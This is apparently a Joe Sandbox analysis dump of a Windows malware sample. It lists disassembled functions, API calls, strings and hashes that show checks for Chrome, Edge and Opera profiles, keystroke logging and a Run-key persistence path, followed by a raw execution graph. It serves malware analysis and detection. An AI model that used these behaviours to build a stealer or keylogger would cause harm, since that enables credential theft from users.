                                      Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398
                                      • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                      • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                      • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                      • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040
                                      • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                      • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                      • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                      • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700
                                      • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                      • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                      • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                      • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 0040B64B
                                        • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                        • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                        • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                        • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                        • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 2738857842-2658077756
                                      • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                      • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                      • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                      • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                      • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: uD
                                      • API String ID: 0-2547262877
                                      • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                      • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                      • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                      • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem
                                      • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                      • API String ID: 2086374402-949981407
                                      • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                      • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                      • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                      • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: !D@$open
                                      • API String ID: 587946157-1586967515
                                      • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                      • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                      • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                      • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___initconout.LIBCMT ref: 0045555B
                                        • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                      • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConsoleCreateFileWrite___initconout
                                      • String ID: PkGNG
                                      • API String ID: 3087715906-263838557
                                      • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                      • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                      • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                      • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 0040B6A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                      • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                      • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                      • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      • __Init_thread_footer.LIBCMT ref: 00410F29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: ,kG$0kG
                                      • API String ID: 1881088180-2015055088
                                      • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                      • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                      • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                      • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                      • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 2654517830-1051519024
                                      • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                      • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                      • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                      • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F30A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CommandLine
                                      • String ID: 83
                                      • API String ID: 3253501508-3252599246
                                      • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                      • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                      • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                      • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                      • GetLastError.KERNEL32 ref: 00440D35
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                      • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                      • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                      • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                      • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                      • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                      • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0
                                      • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                      • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                      • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                      • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:6.5%
                                      Dynamic/Decrypted Code Coverage:9.2%
                                      Signature Coverage:0%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:111
                                      execution_graph 40560 441819 40563 430737 40560->40563 40562 441825 40564 430756 40563->40564 40576 43076d 40563->40576 40565 430774 40564->40565 40566 43075f 40564->40566 40577 43034a 40565->40577 40588 4169a7 11 API calls 40566->40588 40569 4307ce 40570 430819 memset 40569->40570 40581 415b2c 40569->40581 40570->40576 40571 43077e 40571->40569 40574 4307fa 40571->40574 40571->40576 40573 4307e9 40573->40570 40573->40576 40589 4169a7 11 API calls 40574->40589 40576->40562 40578 430359 40577->40578 40579 43034e 40577->40579 40578->40571 40590 415c23 memcpy 40579->40590 40582 415b42 40581->40582 40587 415b46 40581->40587 40583 415b94 40582->40583 40584 415b5a 40582->40584 40582->40587 40585 4438b5 10 API calls 40583->40585 40586 415b79 memcpy 40584->40586 40584->40587 40585->40587 40586->40587 40587->40573 40588->40576 40589->40576 40590->40578 37676 442ec6 19 API calls 37853 4152c6 malloc 37854 4152e2 37853->37854 37855 4152ef 37853->37855 37857 416760 11 API calls 37855->37857 37857->37854 37858 4466f4 37877 446904 37858->37877 37860 446700 GetModuleHandleA 37863 446710 __set_app_type __p__fmode __p__commode 37860->37863 37862 4467a4 37864 4467ac __setusermatherr 37862->37864 37865 4467b8 37862->37865 37863->37862 37864->37865 37878 4468f0 _controlfp 37865->37878 37867 4467bd _initterm __wgetmainargs _initterm 37869 44681e GetStartupInfoW 37867->37869 37870 446810 37867->37870 37871 446866 GetModuleHandleA 37869->37871 37879 41276d 37871->37879 37875 446896 exit 37876 44689d _cexit 37875->37876 37876->37870 37877->37860 37878->37867 37880 41277d 37879->37880 37922 4044a4 LoadLibraryW 37880->37922 37882 412785 37914 412789 37882->37914 37930 414b81 37882->37930 37885 4127c8 37936 412465 memset ??2@YAPAXI 37885->37936 37887 4127ea 37948 40ac21 37887->37948 37892 412813 37966 40dd07 memset 37892->37966 37893 412827 37971 40db69 memset 37893->37971 37896 412822 37992 4125b6 ??3@YAXPAX 37896->37992 37898 40ada2 _wcsicmp 37899 41283d 37898->37899 37899->37896 37902 412863 CoInitialize 37899->37902 37976 41268e 37899->37976 37996 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37902->37996 37906 41296f 37998 40b633 37906->37998 37909 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37913 412957 37909->37913 37919 4128ca 37909->37919 37913->37896 37914->37875 37914->37876 37915 4128d0 TranslateAcceleratorW 37916 412941 GetMessageW 37915->37916 37915->37919 37916->37913 37916->37915 37917 412909 IsDialogMessageW 37917->37916 37917->37919 37918 4128fd IsDialogMessageW 37918->37916 37918->37917 37919->37915 37919->37917 37919->37918 37920 41292b TranslateMessage DispatchMessageW 37919->37920 37921 41291f IsDialogMessageW 37919->37921 37920->37916 37921->37916 37921->37920 37923 4044cf GetProcAddress 37922->37923 37926 4044f7 37922->37926 37924 4044e8 FreeLibrary 37923->37924 37927 4044df 37923->37927 37925 4044f3 37924->37925 37924->37926 37925->37926 37928 404507 MessageBoxW 37926->37928 37929 40451e 37926->37929 37927->37924 37928->37882 37929->37882 37931 414b8a 37930->37931 37932 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37930->37932 38002 40a804 memset 37931->38002 37932->37885 37935 414b9e GetProcAddress 37935->37932 37937 4124e0 37936->37937 37938 412505 ??2@YAPAXI 37937->37938 37939 41251c 37938->37939 37941 412521 37938->37941 38024 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37939->38024 38013 444722 37941->38013 37947 41259b wcscpy 37947->37887 38029 40b1ab ??3@YAXPAX ??3@YAXPAX 37948->38029 37952 40ad4b 37961 40ad76 37952->37961 38053 40a9ce 37952->38053 37953 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37955 40ac5c 37953->37955 37955->37952 37955->37953 37956 40ace7 ??3@YAXPAX 37955->37956 37955->37961 38033 40a8d0 37955->38033 38045 4099f4 37955->38045 37956->37955 37960 40a8d0 7 API calls 37960->37961 38030 40aa04 37961->38030 37962 40ada2 37963 40adc9 37962->37963 37964 40adaa 37962->37964 37963->37892 37963->37893 37964->37963 37965 40adb3 _wcsicmp 37964->37965 37965->37963 37965->37964 38058 40dce0 37966->38058 37968 40dd3a GetModuleHandleW 38063 40dba7 37968->38063 37972 40dce0 3 API calls 37971->37972 37973 40db99 37972->37973 38135 40dae1 37973->38135 38149 402f3a 37976->38149 37978 412766 37978->37896 37978->37902 37979 4126d3 _wcsicmp 37980 4126a8 37979->37980 37980->37978 37980->37979 37982 41270a 37980->37982 38183 4125f8 7 API calls 37980->38183 37982->37978 38152 411ac5 37982->38152 37993 4125da 37992->37993 37994 4125f0 37993->37994 37995 4125e6 DeleteObject 37993->37995 37997 40b1ab ??3@YAXPAX ??3@YAXPAX 37994->37997 37995->37994 37996->37909 37997->37906 37999 40b640 37998->37999 38000 40b639 ??3@YAXPAX 37998->38000 38001 40b1ab ??3@YAXPAX ??3@YAXPAX 37999->38001 38000->37999 38001->37914 38003 40a83b GetSystemDirectoryW 38002->38003 38004 40a84c wcscpy 38002->38004 38003->38004 38009 409719 wcslen 38004->38009 38007 40a881 LoadLibraryW 38008 40a886 38007->38008 38008->37932 38008->37935 38010 409724 38009->38010 38011 409739 wcscat LoadLibraryW 38009->38011 38010->38011 38012 40972c wcscat 38010->38012 38011->38007 38011->38008 38012->38011 38014 444732 38013->38014 38015 444728 DeleteObject 38013->38015 38025 409cc3 38014->38025 38015->38014 38017 412551 38018 4010f9 38017->38018 38019 401130 38018->38019 38020 401134 GetModuleHandleW LoadIconW 38019->38020 38021 401107 wcsncat 38019->38021 38022 40a7be 38020->38022 38021->38019 38023 40a7d2 38022->38023 38023->37947 38023->38023 38024->37941 38028 409bfd memset wcscpy 38025->38028 38027 409cdb CreateFontIndirectW 38027->38017 38028->38027 38029->37955 38031 40aa14 38030->38031 38032 40aa0a ??3@YAXPAX 38030->38032 38031->37962 38032->38031 38034 40a8eb 38033->38034 38035 40a8df wcslen 38033->38035 38036 40a906 ??3@YAXPAX 38034->38036 38037 40a90f 38034->38037 38035->38034 38038 40a919 38036->38038 38039 4099f4 3 API calls 38037->38039 38040 40a932 38038->38040 38041 40a929 ??3@YAXPAX 38038->38041 38039->38038 38043 4099f4 3 API calls 38040->38043 38042 40a93e memcpy 38041->38042 38042->37955 38044 40a93d 38043->38044 38044->38042 38046 409a41 38045->38046 38047 4099fb malloc 38045->38047 38046->37955 38049 409a37 38047->38049 38050 409a1c 38047->38050 38049->37955 38051 409a30 ??3@YAXPAX 38050->38051 38052 409a20 memcpy 38050->38052 38051->38049 38052->38051 38054 40a9e7 38053->38054 38055 40a9dc ??3@YAXPAX 38053->38055 38057 4099f4 3 API calls 38054->38057 38056 40a9f2 38055->38056 38056->37960 38057->38056 38082 409bca GetModuleFileNameW 38058->38082 38060 40dce6 wcsrchr 38061 40dcf5 38060->38061 38062 40dcf9 wcscat 38060->38062 38061->38062 38062->37968 38083 44db70 38063->38083 38067 40dbfd 38086 4447d9 38067->38086 38070 40dc34 wcscpy wcscpy 38112 40d6f5 38070->38112 38071 40dc1f wcscpy 38071->38070 38074 40d6f5 3 API calls 38075 40dc73 38074->38075 38076 40d6f5 3 API calls 38075->38076 38077 40dc89 38076->38077 38078 40d6f5 3 API calls 38077->38078 38079 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38078->38079 38118 40da80 38079->38118 38082->38060 38084 40dbb4 memset memset 38083->38084 38085 409bca GetModuleFileNameW 38084->38085 38085->38067 38088 4447f4 38086->38088 38087 40dc1b 38087->38070 38087->38071 38088->38087 38089 444807 ??2@YAPAXI 38088->38089 38090 44481f 38089->38090 38091 444873 _snwprintf 38090->38091 38092 4448ab wcscpy 38090->38092 38125 44474a 8 API calls 38091->38125 38094 4448bb 38092->38094 38126 44474a 8 API calls 38094->38126 38095 4448a7 38095->38092 38095->38094 38097 4448cd 38127 44474a 8 API calls 38097->38127 38099 4448e2 38128 44474a 8 API calls 38099->38128 38101 4448f7 38129 44474a 8 API calls 38101->38129 38103 44490c 38130 44474a 8 API calls 38103->38130 38105 444921 38131 44474a 8 API calls 38105->38131 38107 444936 38132 44474a 8 API calls 38107->38132 38109 44494b 38133 44474a 8 API calls 38109->38133 38111 444960 ??3@YAXPAX 38111->38087 38113 44db70 38112->38113 38114 40d702 memset GetPrivateProfileStringW 38113->38114 38115 40d752 38114->38115 38116 40d75c WritePrivateProfileStringW 38114->38116 38115->38116 38117 40d758 38115->38117 38116->38117 38117->38074 38119 44db70 38118->38119 38120 40da8d memset 38119->38120 38121 40daac LoadStringW 38120->38121 38122 40dac6 38121->38122 38122->38121 38124 40dade 38122->38124 38134 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38122->38134 38124->37896 38125->38095 38126->38097 38127->38099 38128->38101 38129->38103 38130->38105 38131->38107 38132->38109 38133->38111 38134->38122 38145 409b98 GetFileAttributesW 38135->38145 38137 40daea 38138 40db63 38137->38138 38139 40daef wcscpy wcscpy GetPrivateProfileIntW 38137->38139 38138->37898 38146 40d65d GetPrivateProfileStringW 38139->38146 38141 40db3e 38147 40d65d GetPrivateProfileStringW 38141->38147 38143 40db4f 38148 40d65d GetPrivateProfileStringW 38143->38148 38145->38137 38146->38141 38147->38143 38148->38138 38184 40eaff 38149->38184 38153 411ae2 memset 38152->38153 38154 411b8f 38152->38154 38224 409bca GetModuleFileNameW 38153->38224 38166 411a8b 38154->38166 38156 411b0a wcsrchr 38157 411b22 wcscat 38156->38157 38158 411b1f 38156->38158 38225 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38157->38225 38158->38157 38160 411b67 38226 402afb 38160->38226 38164 411b7f 38282 40ea13 SendMessageW memset SendMessageW 38164->38282 38167 402afb 27 API calls 38166->38167 38168 411ac0 38167->38168 38169 4110dc 38168->38169 38170 41113e 38169->38170 38175 4110f0 38169->38175 38307 40969c LoadCursorW SetCursor 38170->38307 38172 411143 38308 4032b4 38172->38308 38326 444a54 38172->38326 38173 4110f7 _wcsicmp 38173->38175 38174 411157 38176 40ada2 _wcsicmp 38174->38176 38175->38170 38175->38173 38329 410c46 10 API calls 38175->38329 38179 411167 38176->38179 38177 4111af 38179->38177 38180 4111a6 qsort 38179->38180 38180->38177 38183->37980 38185 40eb10 38184->38185 38197 40e8e0 38185->38197 38188 40eb6c memcpy memcpy 38189 40ebb7 38188->38189 38189->38188 38190 40ebf2 ??2@YAPAXI ??2@YAPAXI 38189->38190 38193 40d134 16 API calls 38189->38193 38191 40ec2e ??2@YAPAXI 38190->38191 38194 40ec65 38190->38194 38191->38194 38193->38189 38194->38194 38207 40ea7f 38194->38207 38196 402f49 38196->37980 38198 40e8f2 38197->38198 38199 40e8eb ??3@YAXPAX 38197->38199 38200 40e900 38198->38200 38201 40e8f9 ??3@YAXPAX 38198->38201 38199->38198 38202 40e911 38200->38202 38203 40e90a ??3@YAXPAX 38200->38203 38201->38200 38204 40e931 ??2@YAPAXI ??2@YAPAXI 38202->38204 38205 40e921 ??3@YAXPAX 38202->38205 38206 40e92a ??3@YAXPAX 38202->38206 38203->38202 38204->38188 